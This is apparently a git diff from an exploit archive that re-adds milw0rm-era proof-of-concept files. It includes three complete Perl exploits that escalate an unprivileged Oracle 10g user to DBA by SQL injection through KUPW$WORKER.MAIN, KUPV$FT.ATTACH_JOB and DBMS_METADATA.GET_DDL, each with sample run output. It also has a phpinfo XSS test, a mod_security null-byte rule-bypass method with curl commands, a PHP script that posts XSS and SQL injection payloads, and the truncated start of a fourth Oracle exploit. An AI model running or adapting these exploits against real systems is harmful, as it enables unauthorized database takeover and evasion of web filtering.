-# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil function...\n"; -$dbh->do( qq{ -CREATE OR REPLACE FUNCTION OWN RETURN NUMBER - AUTHID CURRENT_USER AS - PRAGMA AUTONOMOUS_TRANSACTION; -BEGIN - EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; - RETURN(0); -END; -} ); - -print "[-] Go ...(don't worry about errors)!\n"; -my $sth = $dbh->prepare( qq{ -BEGIN - SYS.KUPW\$WORKER.MAIN(''' AND 0=$user.own--',''); -END;}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-22] +#!/usr/bin/perl +# +# Remote Oracle KUPW$WORKER.MAIN exploit (10g) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/archive/1/440439 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Thu Feb 22 17:48:27 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ 
perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupw-worker.pl line 94. +# [-] Done! +# +# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil function... +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-39079: unable to enqueue message DG +# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 86 +# ORA-06512: at "SYS.KUPC$QUE_INT", line 912 +# ORA-00931: missing identifier +# ORA-06512: at "SYS.KUPC$QUE_INT", line 1910 +# ORA-06512: at line 1 +# ORA-06512: at "SYS.KUPC$QUEUE_INT", line 591 +# ORA-06512: at "SYS.KUPW$WORKER", line 13468 +# ORA-06512: at "SYS.KUPW$WORKER", line 5810 +# ORA-39125: Worker unexpected fatal error in KUPW$WORKER.MAIN while calling KUPC$QUEUE_INT.ATTACH_QUEUE [] +# ORA-06512: at "SYS.KUPW$WORKER", line 1243 +# ORA-31626: job does not exist +# ORA-39086: cannot retrieve job information +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.KUPW$WORKER.MAIN(''' AND 0=BUNKER.own--',''); +# END;"] at kupw-worker.pl line 116. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupw-worker.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! 
+# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil function...\n"; +$dbh->do( qq{ +CREATE OR REPLACE FUNCTION OWN RETURN NUMBER + AUTHID CURRENT_USER AS + PRAGMA AUTONOMOUS_TRANSACTION; +BEGIN + EXECUTE IMMEDIATE '$sqlcmd'; COMMIT; + RETURN(0); +END; +} ); + +print "[-] Go ...(don't worry about errors)!\n"; +my $sth = $dbh->prepare( qq{ +BEGIN + SYS.KUPW\$WORKER.MAIN(''' AND 0=$user.own--',''); +END;}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-22] diff --git a/platforms/multiple/remote/3359.pl b/platforms/multiple/remote/3359.pl index 5bc56493d..36f3483e9 100755 --- a/platforms/multiple/remote/3359.pl +++ b/platforms/multiple/remote/3359.pl 
@@ -1,125 +1,125 @@
-#!/usr/bin/perl
-#
-# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
-#
-# Grant or revoke dba permission to unprivileged user
-#
-# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
-#
-# REF: http://www.securityfocus.com/bid/16294
-#
-# AUTHOR: Andrea "bunker" Purificato
-# http://rawlab.mindcreations.com
-#
-# DATE: Copyright 2007 - Thu Feb 22 17:18:55 CET 2007
-#
-# Oracle InstantClient (basic + sdk) required for DBD::Oracle
-#
-#
-# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r
-# [-] Wait...
-# [-] Revoking DBA from BUNKER...
-# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_job.pl line 61.
-# [-] Done!
-#
-# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -g
-# [-] Wait...
-# [-] Creating evil function...
-# [-] Go ...(don't worry about error)!
-# DBD::Oracle::st execute failed: ORA-31626: job does not exist
-# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
-# ORA-06512: at "SYS.KUPV$FT", line 330
-# ORA-31638: cannot attach to job ' AND 0=BUNKER.own-- for user
-# ORA-31632: master table ".' AND 0=BUNKER.own--" not found, invalid, or inaccessible
-# ORA-00942: table or view does not exist
-# ORA-06512: at line 6 (DBD ERROR: OCIStmtExecute) [for Statement "
-# DECLARE
-# J BOOLEAN;
-# R NUMBER;
-# BEGIN
-# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=BUNKER.own--',J);
-# END;
-# "] at kupv-ft_attach_job.pl line 87.
-# [-] YOU GOT THE POWAH!!
-#
-# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r
-# [-] Wait...
-# [-] Revoking DBA from BUNKER...
-# [-] Done!
-#
-
-use warnings;
-use strict;
-use DBI;
-use Getopt::Std;
-use vars qw/ %opt /;
-
-sub usage {
- print <<"USAGE";
-
-Syntax: $0 -h -s -u -p -g|-r [-P ]
-
-Options:
- -h target server address
- -s target sid name
- -u user
- -p password
-
- -g|-r (g)rant dba to user | (r)evoke dba from user
- [-P Oracle port]
-
-USAGE
- exit 0
-}
-
-my $opt_string = 'h:s:u:p:grP:';
-getopts($opt_string, \%opt) or &usage;
-&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
-&usage if ( !$opt{g} and !$opt{r} );
-my $user = uc $opt{u};
-
-my $dbh = undef;
-if ($opt{P}) {
- $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
-} else {
- $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
-}
-
-my $sqlcmd = "GRANT DBA TO $user";
-print "[-] Wait...\n";
-
-if ($opt{r}) {
- print "[-] Revoking DBA from $user...\n";
- $sqlcmd = "REVOKE DBA FROM $user";
- $dbh->do( $sqlcmd );
- print "[-] Done!\n";
- $dbh->disconnect;
- exit;
-}
-
-print "[-] Creating evil function...\n";
-$dbh->do( qq{
-CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
- AUTHID CURRENT_USER AS
- PRAGMA AUTONOMOUS_TRANSACTION;
-BEGIN
- EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
- RETURN(0);
-END;
-} );
-
-print "[-] Go ...(don't worry about errors)!\n";
-my $sth = $dbh->prepare( qq{
-DECLARE
- J BOOLEAN; R NUMBER;
-BEGIN
- R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=$user.own--',J);
-END;
-});
-$sth->execute;
-$sth->finish;
-print "[-] YOU GOT THE POWAH!!\n";
-$dbh->disconnect;
-exit;
-
-# milw0rm.com [2007-02-22]
+#!/usr/bin/perl
+#
+# Remote Oracle KUPV$FT.ATTACH_JOB exploit (10g)
+#
+# Grant or revoke dba permission to unprivileged user
+#
+# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
+#
+# REF: http://www.securityfocus.com/bid/16294
+#
+# AUTHOR: Andrea "bunker" Purificato
+# http://rawlab.mindcreations.com
+#
+# DATE: Copyright 2007 - Thu Feb 22 17:18:55 CET 2007
+#
+# Oracle InstantClient (basic + sdk) required for DBD::Oracle
+#
+#
+# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r
+# [-] Wait...
+# [-] Revoking DBA from BUNKER...
+# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupv-ft_attach_job.pl line 61.
+# [-] Done!
+#
+# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -g
+# [-] Wait...
+# [-] Creating evil function...
+# [-] Go ...(don't worry about error)!
+# DBD::Oracle::st execute failed: ORA-31626: job does not exist
+# ORA-06512: at "SYS.DBMS_SYS_ERROR", line 79
+# ORA-06512: at "SYS.KUPV$FT", line 330
+# ORA-31638: cannot attach to job ' AND 0=BUNKER.own-- for user
+# ORA-31632: master table ".' AND 0=BUNKER.own--" not found, invalid, or inaccessible
+# ORA-00942: table or view does not exist
+# ORA-06512: at line 6 (DBD ERROR: OCIStmtExecute) [for Statement "
+# DECLARE
+# J BOOLEAN;
+# R NUMBER;
+# BEGIN
+# R:=SYS.KUPV$FT.ATTACH_JOB('',''' AND 0=BUNKER.own--',J);
+# END;
+# "] at kupv-ft_attach_job.pl line 87.
+# [-] YOU GOT THE POWAH!!
+#
+# bunker@fin:~$ perl kupv-ft_attach_job.pl -h localhost -s test -u bunker -p **** -r
+# [-] Wait...
+# [-] Revoking DBA from BUNKER...
+# [-] Done!
+#
+
+use warnings;
+use strict;
+use DBI;
+use Getopt::Std;
+use vars qw/ %opt /;
+
+sub usage {
+ print <<"USAGE";
+
+Syntax: $0 -h -s -u -p -g|-r [-P ]
+
+Options:
+ -h target server address
+ -s target sid name
+ -u user
+ -p password
+
+ -g|-r (g)rant dba to user | (r)evoke dba from user
+ [-P Oracle port]
+
+USAGE
+ exit 0
+}
+
+my $opt_string = 'h:s:u:p:grP:';
+getopts($opt_string, \%opt) or &usage;
+&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
+&usage if ( !$opt{g} and !$opt{r} );
+my $user = uc $opt{u};
+
+my $dbh = undef;
+if ($opt{P}) {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
+} else {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
+}
+
+my $sqlcmd = "GRANT DBA TO $user";
+print "[-] Wait...\n";
+
+if ($opt{r}) {
+ print "[-] Revoking DBA from $user...\n";
+ $sqlcmd = "REVOKE DBA FROM $user";
+ $dbh->do( $sqlcmd );
+ print "[-] Done!\n";
+ $dbh->disconnect;
+ exit;
+}
+
+print "[-] Creating evil function...\n";
+$dbh->do( qq{
+CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
+ AUTHID CURRENT_USER AS
+ PRAGMA AUTONOMOUS_TRANSACTION;
+BEGIN
+ EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
+ RETURN(0);
+END;
+} );
+
+print "[-] Go ...(don't worry about errors)!\n";
+my $sth = $dbh->prepare( qq{
+DECLARE
+ J BOOLEAN; R NUMBER;
+BEGIN
+ R:=SYS.KUPV\$FT.ATTACH_JOB('',''' AND 0=$user.own--',J);
+END;
+});
+$sth->execute;
+$sth->finish;
+print "[-] YOU GOT THE POWAH!!\n";
+$dbh->disconnect;
+exit;
+
+# milw0rm.com [2007-02-22]
diff --git a/platforms/multiple/remote/3363.pl b/platforms/multiple/remote/3363.pl
index 195b75bbc..873533b90 100755
--- a/platforms/multiple/remote/3363.pl
+++ b/platforms/multiple/remote/3363.pl
@@ -1,122 +1,122 @@
-#!/usr/bin/perl
-#
-# Remote Oracle DBMS_METADAT.GET_DDL exploit (9i/10g)
-#
-# Grant or revoke dba permission to unprivileged user
-#
-# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
-#
-# REF: http://www.securityfocus.com/bid/16287
-#
-# AUTHOR: Andrea "bunker" Purificato
-# http://rawlab.mindcreations.com
-#
-# DATE: Copyright 2007 - Fri Feb 23 12:32:55 CET 2007
-#
-# Oracle InstantClient (basic + sdk) required for DBD::Oracle
-#
-#
-# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
-# [-] Wait...
-# [-] Revoking DBA from BUNKER...
-# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddl.pl line 95.
-# [-] Done!
-#
-# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -g
-# [-] Wait...
-# [-] Creating evil function...
-# [-] Go ...(don't worry about errors)!
-# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||BUNKER.own||' for parameter OBJECT_TYPE in function GET_DDL
-# ORA-06512: at "SYS.DBMS_METADATA", line 2576
-# ORA-06512: at "SYS.DBMS_METADATA", line 2627
-# ORA-06512: at "SYS.DBMS_METADATA", line 4220
-# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
-# DECLARE
-# R CLOB;
-# BEGIN
-# R := SYS.DBMS_METADATA.GET_DDL('''||BUNKER.own||''','');
-# END;
-# "] at dbms_meta_get_ddl.pl line 120.
-# [-] YOU GOT THE POWAH!!
-#
-# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
-# [-] Wait...
-# [-] Revoking DBA from BUNKER...
-# [-] Done!
-#
-
-use warnings;
-use strict;
-use DBI;
-use Getopt::Std;
-use vars qw/ %opt /;
-
-sub usage {
- print <<"USAGE";
-
-Syntax: $0 -h -s -u -p -g|-r [-P ]
-
-Options:
- -h target server address
- -s target sid name
- -u user
- -p password
-
- -g|-r (g)rant dba to user | (r)evoke dba from user
- [-P Oracle port]
-
-USAGE
- exit 0
-}
-
-my $opt_string = 'h:s:u:p:grP:';
-getopts($opt_string, \%opt) or &usage;
-&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
-&usage if ( !$opt{g} and !$opt{r} );
-my $user = uc $opt{u};
-
-my $dbh = undef;
-if ($opt{P}) {
- $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
-} else {
- $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
-}
-
-my $sqlcmd = "GRANT DBA TO $user";
-print "[-] Wait...\n";
-
-if ($opt{r}) {
- print "[-] Revoking DBA from $user...\n";
- $sqlcmd = "REVOKE DBA FROM $user";
- $dbh->do( $sqlcmd );
- print "[-] Done!\n";
- $dbh->disconnect;
- exit;
-}
-
-print "[-] Creating evil function...\n";
-$dbh->do( qq{
-CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
- AUTHID CURRENT_USER AS
- PRAGMA AUTONOMOUS_TRANSACTION;
-BEGIN
- EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
- RETURN(0);
-END;
-} );
-
-print "[-] Go ...(don't worry about errors)!\n";
-my $sth = $dbh->prepare(qq{
-DECLARE
- R CLOB;
-BEGIN
- R := SYS.DBMS_METADATA.GET_DDL('''||$user.own||''','');
-END;
-});
-$sth->execute;
-$sth->finish;
-print "[-] YOU GOT THE POWAH!!\n";
-$dbh->disconnect;
-exit;
-
-# milw0rm.com [2007-02-23]
+#!/usr/bin/perl
+#
+# Remote Oracle DBMS_METADAT.GET_DDL exploit (9i/10g)
+#
+# Grant or revoke dba permission to unprivileged user
+#
+# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
+#
+# REF: http://www.securityfocus.com/bid/16287
+#
+# AUTHOR: Andrea "bunker" Purificato
+# http://rawlab.mindcreations.com
+#
+# DATE: Copyright 2007 - Fri Feb 23 12:32:55 CET 2007
+#
+# Oracle InstantClient (basic + sdk) required for DBD::Oracle
+#
+#
+# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
+# [-] Wait...
+# [-] Revoking DBA from BUNKER...
+# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddl.pl line 95.
+# [-] Done!
+#
+# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -g
+# [-] Wait...
+# [-] Creating evil function...
+# [-] Go ...(don't worry about errors)!
+# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||BUNKER.own||' for parameter OBJECT_TYPE in function GET_DDL
+# ORA-06512: at "SYS.DBMS_METADATA", line 2576
+# ORA-06512: at "SYS.DBMS_METADATA", line 2627
+# ORA-06512: at "SYS.DBMS_METADATA", line 4220
+# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement "
+# DECLARE
+# R CLOB;
+# BEGIN
+# R := SYS.DBMS_METADATA.GET_DDL('''||BUNKER.own||''','');
+# END;
+# "] at dbms_meta_get_ddl.pl line 120.
+# [-] YOU GOT THE POWAH!!
+#
+# bunker@fin:~$ perl dbms_meta_get_ddl.pl -h localhost -s test -u bunker -p **** -r
+# [-] Wait...
+# [-] Revoking DBA from BUNKER...
+# [-] Done!
+#
+
+use warnings;
+use strict;
+use DBI;
+use Getopt::Std;
+use vars qw/ %opt /;
+
+sub usage {
+ print <<"USAGE";
+
+Syntax: $0 -h -s -u -p -g|-r [-P ]
+
+Options:
+ -h target server address
+ -s target sid name
+ -u user
+ -p password
+
+ -g|-r (g)rant dba to user | (r)evoke dba from user
+ [-P Oracle port]
+
+USAGE
+ exit 0
+}
+
+my $opt_string = 'h:s:u:p:grP:';
+getopts($opt_string, \%opt) or &usage;
+&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
+&usage if ( !$opt{g} and !$opt{r} );
+my $user = uc $opt{u};
+
+my $dbh = undef;
+if ($opt{P}) {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
+} else {
+ $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
+}
+
+my $sqlcmd = "GRANT DBA TO $user";
+print "[-] Wait...\n";
+
+if ($opt{r}) {
+ print "[-] Revoking DBA from $user...\n";
+ $sqlcmd = "REVOKE DBA FROM $user";
+ $dbh->do( $sqlcmd );
+ print "[-] Done!\n";
+ $dbh->disconnect;
+ exit;
+}
+
+print "[-] Creating evil function...\n";
+$dbh->do( qq{
+CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
+ AUTHID CURRENT_USER AS
+ PRAGMA AUTONOMOUS_TRANSACTION;
+BEGIN
+ EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
+ RETURN(0);
+END;
+} );
+
+print "[-] Go ...(don't worry about errors)!\n";
+my $sth = $dbh->prepare(qq{
+DECLARE
+ R CLOB;
+BEGIN
+ R := SYS.DBMS_METADATA.GET_DDL('''||$user.own||''','');
+END;
+});
+$sth->execute;
+$sth->finish;
+print "[-] YOU GOT THE POWAH!!\n";
+$dbh->disconnect;
+exit;
+
+# milw0rm.com [2007-02-23]
diff --git a/platforms/multiple/remote/3405.txt b/platforms/multiple/remote/3405.txt
index b36b2ca08..c81e55bd7 100755
--- a/platforms/multiple/remote/3405.txt
+++ b/platforms/multiple/remote/3405.txt
@@ -1,18 +1,18 @@
- ////////////////////////////////////////////////////////////////////////
- // _ _ _ _ ___ _ _ ___ //
- // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
- // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
- // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
- // //
- // Proof of concept code from the Hardened-PHP Project //
- // (C) Copyright 2007 Stefan Esser //
- // //
- ////////////////////////////////////////////////////////////////////////
- // PHP 4 - phpinfo() XSS Testcase //
- ////////////////////////////////////////////////////////////////////////
-
-To manually test for this vulnerability just call the phpinfo() page with a parameter like this.
-
-http://localhost/phpinfo.php?a[]=
-
-# milw0rm.com [2007-03-04]
+ ////////////////////////////////////////////////////////////////////////
+ // _ _ _ _ ___ _ _ ___ //
+ // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
+ // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
+ // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
+ // //
+ // Proof of concept code from the Hardened-PHP Project //
+ // (C) Copyright 2007 Stefan Esser //
+ // //
+ ////////////////////////////////////////////////////////////////////////
+ // PHP 4 - phpinfo() XSS Testcase //
+ ////////////////////////////////////////////////////////////////////////
+
+To manually test for this vulnerability just call the phpinfo() page with a parameter like this.
+
+http://localhost/phpinfo.php?a[]=
+
+# milw0rm.com [2007-03-04]
diff --git a/platforms/multiple/remote/3425.txt b/platforms/multiple/remote/3425.txt
index 7df0af788..800970969 100755
--- a/platforms/multiple/remote/3425.txt
+++ b/platforms/multiple/remote/3425.txt
@@ -1,48 +1,48 @@
-mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability
-http://www.php-security.org/MOPB/BONUS-12-2007.html
-
-Affected is mod_security <= 2.1.0 Detailed information
-
-Detailed information
-
-When mod_security receives a request it parses it into web application
-parameters in a way it believes is correct. Because the way it parses
-the incoming data follows the rules defined in RFCs and not the reality
-of how the HTTP request parsers are implemented in Perl, Python, Java,
-PHP there are a number of bypass vulnerabilities when the RFC and
-reality mismatch.
-
-One of the these differences is the way ASCIIZ bytes are handled when
-they occur in POST data of the application/x-www-form-urlencoded
-content-type. Because mod_security handles POST data of this kind as a C
-string it does not touch anything behind the first ASCIIZ byte because
-in the eyes of mod_security this is the end of the data.
-
-Unfortunately for mod_security this is not how the HTTP parsers of the
-different script languages handle this situation. Most script languages
-(Perl, Python, ...) just ignore the ASCIIZ byte and parse the data as if
-it is legal. Since PHP 5.2.0 this also applies to PHP. Proof of concept,
-exploit or instructions to reproduce
-
-
-
-Now call it with a command like
-
-$ echo -e "&var=" > postdata
-$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
-
-
-The example should not be blocked (because this is the default
-configuration) but in your error.log you will find a line saying that a
-possible XSS attack was detected.
-
-Now try the same with a ASCIIZ byte embedded.
-
-$ echo -e "\000&var=" > postdata
-$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
-
-
-This time there should be no log message in your error.log, because
-mod_security cannot see the var parameter behind the ASCIIZ byte.
-
-# milw0rm.com [2007-03-07]
+mod_security <= 2.1.0 (ASCIIZ byte) POST Rules Bypass Vulnerability
+http://www.php-security.org/MOPB/BONUS-12-2007.html
+
+Affected is mod_security <= 2.1.0 Detailed information
+
+Detailed information
+
+When mod_security receives a request it parses it into web application
+parameters in a way it believes is correct. Because the way it parses
+the incoming data follows the rules defined in RFCs and not the reality
+of how the HTTP request parsers are implemented in Perl, Python, Java,
+PHP there are a number of bypass vulnerabilities when the RFC and
+reality mismatch.
+
+One of the these differences is the way ASCIIZ bytes are handled when
+they occur in POST data of the application/x-www-form-urlencoded
+content-type. Because mod_security handles POST data of this kind as a C
+string it does not touch anything behind the first ASCIIZ byte because
+in the eyes of mod_security this is the end of the data.
+
+Unfortunately for mod_security this is not how the HTTP parsers of the
+different script languages handle this situation. Most script languages
+(Perl, Python, ...) just ignore the ASCIIZ byte and parse the data as if
+it is legal. Since PHP 5.2.0 this also applies to PHP. Proof of concept,
+exploit or instructions to reproduce
+
+
+
+Now call it with a command like
+
+$ echo -e "&var=" > postdata
+$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
+
+
+The example should not be blocked (because this is the default
+configuration) but in your error.log you will find a line saying that a
+possible XSS attack was detected.
+
+Now try the same with a ASCIIZ byte embedded.
+
+$ echo -e "\000&var=" > postdata
+$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent
+
+
+This time there should be no log message in your error.log, because
+mod_security cannot see the var parameter behind the ASCIIZ byte.
+
+# milw0rm.com [2007-03-07]
diff --git a/platforms/multiple/remote/3452.php b/platforms/multiple/remote/3452.php
index c015b4625..15ff9e0bb 100755
--- a/platforms/multiple/remote/3452.php
+++ b/platforms/multiple/remote/3452.php
@@ -1,54 +1,54 @@
-alert(/XSS/);";
- $_POST['var2'] = " ' UNION SELECT ";
-
- $url = "http://127.0.0.1/info.php";
-
- // You do not need to change anything below this
-
- $outfdf = fdf_create();
- foreach ($_POST as $key => $value) {
- fdf_set_value($outfdf, $key, $value, 0);
- }
- fdf_save($outfdf, "outtest.fdf");
- fdf_close($outfdf);
-
- $ret = file_get_contents("outtest.fdf");
- unlink("outtest.fdf");
-
- $params = array('http' => array(
- 'method' => 'POST',
- 'content' => $ret,
- 'header' => 'Content-Type: application/vnd.fdf'
- ));
-
- $ctx = stream_context_create($params);
- $fp = @fopen($url, 'rb', false, $ctx);
- if (!$fp) {
- die("Cannot open $url");
- }
- $response = @stream_get_contents($fp);
-
- echo $response;
- echo "\n";
-?>
-
-# milw0rm.com [2007-03-10]
+alert(/XSS/);";
+ $_POST['var2'] = " ' UNION SELECT ";
+
+ $url = "http://127.0.0.1/info.php";
+
+ // You do not need to change anything below this
+
+ $outfdf = fdf_create();
+ foreach ($_POST as $key => $value) {
+ fdf_set_value($outfdf, $key, $value, 0);
+ }
+ fdf_save($outfdf, "outtest.fdf");
+ fdf_close($outfdf);
+
+ $ret = file_get_contents("outtest.fdf");
+ unlink("outtest.fdf");
+
+ $params = array('http' => array(
+ 'method' => 'POST',
+ 'content' => $ret,
+ 'header' => 'Content-Type: application/vnd.fdf'
+ ));
+
+ $ctx = stream_context_create($params);
+ $fp = @fopen($url, 'rb', false, $ctx);
+ if (!$fp) {
+ die("Cannot open $url");
+ }
+ $response = @stream_get_contents($fp);
+
+ echo $response;
+ echo "\n";
+?>
+
+# milw0rm.com [2007-03-10]
diff --git a/platforms/multiple/remote/3585.pl b/platforms/multiple/remote/3585.pl
index b1fc0a4ac..995f3a6c8 100755
--- a/platforms/multiple/remote/3585.pl
+++ b/platforms/multiple/remote/3585.pl
@@ -1,112 +1,112 @@
-#!/usr/bin/perl
-#
-# Remote Oracle KUPM$MCP.MAIN exploit (10g)
-#
-# Grant or revoke dba permission to unprivileged user
-#
-# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
-#
-# REF: http://www.red-database-security.com/
-#
-# AUTHOR: Andrea "bunker" Purificato
-# http://rawlab.mindcreations.com
-#
-# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007
-#
-# Oracle InstantClient (basic + sdk) required for DBD::Oracle
-#
-# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
-# [-] Wait...
-# [-] Revoking DBA from BUNKER...
-# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.
-# [-] Done!
-#
-# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g
-# [-] Wait...
